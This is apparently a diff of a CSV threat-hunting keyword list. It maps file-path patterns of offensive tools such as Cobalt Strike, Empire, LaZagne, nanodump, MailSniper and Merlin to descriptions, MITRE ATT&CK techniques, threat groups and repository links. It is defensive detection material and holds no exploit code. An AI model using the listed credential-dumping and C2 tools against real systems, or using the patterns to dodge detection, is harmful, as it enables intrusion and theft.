- Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*/MailRaider.ps1*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" -"*/MailRaider.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1129","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*/MailSniper/*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*/MailRaider.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1129","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/MailSniper/*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*/main/cve-2022-0847.c*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/bbaranoff/CVE-2022-0847","1","1","N/A","N/A","1","49","25","2022-03-07T15:52:23Z","2022-03-07T15:50:18Z" "*/main/exploit.js","offensive_tool_keyword","POC","Adobe Acrobat Reader - CVE-2023-21608 - Remote Code Execution Exploit ","T1203 - T1218 - T1059 - T1064 - T1204","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/hacksysteam/CVE-2023-21608","1","1","N/A","N/A","3","250","57","2023-02-27T04:51:20Z","2023-01-30T12:57:48Z" "*/main/exploit.pdf","offensive_tool_keyword","POC","Adobe Acrobat Reader - CVE-2023-21608 - Remote Code Execution Exploit ","T1203 - T1218 - T1059 - T1064 - T1204","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/hacksysteam/CVE-2023-21608","1","1","N/A","N/A","3","250","57","2023-02-27T04:51:20Z","2023-01-30T12:57:48Z" "*/MaliciousMacroMSBuild*","offensive_tool_keyword","MaliciousMacroMSBuild","Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.","T1059.001 - T1059.003 - T1127 - T1027.002","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/MaliciousMacroMSBuild","1","1","N/A","8","5","488","117","2019-08-06T08:16:05Z","2018-04-09T23:16:30Z" -"*/malleable-c2*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","1","N/A","10","10","1326","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"*/malleable-c2*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","1","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" "*/MalSCCM.git*","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tools","https://github.com/nettitude/MalSCCM","1","1","N/A","10","3","223","34","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z" "*/MalSCCM.sln*","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tools","https://github.com/nettitude/MalSCCM","1","1","N/A","10","3","223","34","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z" "*/malseclogon.*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "*/MalStuff.cpp*","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","9","2","129","24","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" -"*/man_in_the_browser/*.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*/man_in_the_browser/*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/man_in_the_browser/*.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/man_in_the_browser/*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" "*/manage/exec_cmd*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/Management/C2/*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" "*/manjusaka/plugins*","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","664","132","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z" -"*/MANSPIDER.git*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","1","N/A","8","8","772","119","2023-10-03T03:50:49Z","2020-03-18T13:27:20Z" -"*/manspider_*.log*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","772","119","2023-10-03T03:50:49Z","2020-03-18T13:27:20Z" -"*/manspider_output*.txt","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*/manspiderDump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*/master/GPSCoordinates/*","offensive_tool_keyword","GPSCoordinates","Tracks the system's GPS coordinates (accurate within 1km currently) if Location Services are enabled","T1018 - T1059.001","TA0001 - TA0002","N/A","N/A","Reconnaissance","https://github.com/matterpreter/OffensiveCSharp/tree/master/GPSCoordinates","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*/master/JunctionFolder/*","offensive_tool_keyword","JunctionFolder","Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.","T1547.001 - T1574.001 - T1204.002","TA0005 - TA0004","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*/master/PhantomService/*","offensive_tool_keyword","PhantomService","Searches for and removes non-ASCII services that can't be easily removed by built-in Windows tools","T1050.005 - T1055.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/PhantomService","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*/MANSPIDER.git*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","1","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"*/manspider_*.log*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"*/manspider_output*.txt","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/manspiderDump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/masky.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/master/GPSCoordinates/*","offensive_tool_keyword","GPSCoordinates","Tracks the system's GPS coordinates (accurate within 1km currently) if Location Services are enabled","T1018 - T1059.001","TA0001 - TA0002","N/A","N/A","Reconnaissance","https://github.com/matterpreter/OffensiveCSharp/tree/master/GPSCoordinates","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*/master/JunctionFolder/*","offensive_tool_keyword","JunctionFolder","Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.","T1547.001 - T1574.001 - T1204.002","TA0005 - TA0004","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*/master/PhantomService/*","offensive_tool_keyword","PhantomService","Searches for and removes non-ASCII services that can't be easily removed by built-in Windows tools","T1050.005 - T1055.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/PhantomService","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*/maxdb-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/mcafee-epo-agent.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/membase-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/membase-http-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/memcached-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/memodipper64*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" -"*/memory_exec.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*/memorydump.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","8527","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*/memory_exec.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/memorydump.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" "*/mempodipper.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" "*/MemReader_BoF/*","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/MemReader_BoF","1","1","N/A","10","10","26","3","2022-05-12T18:46:02Z","2021-04-21T20:51:25Z" "*/merlin.dll*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" -"*/merlin.html*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4618","763","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" -"*/merlin.js*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4618","763","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" -"*/merlin.py*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","57","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" -"*/merlin/agent_code/*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","57","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" 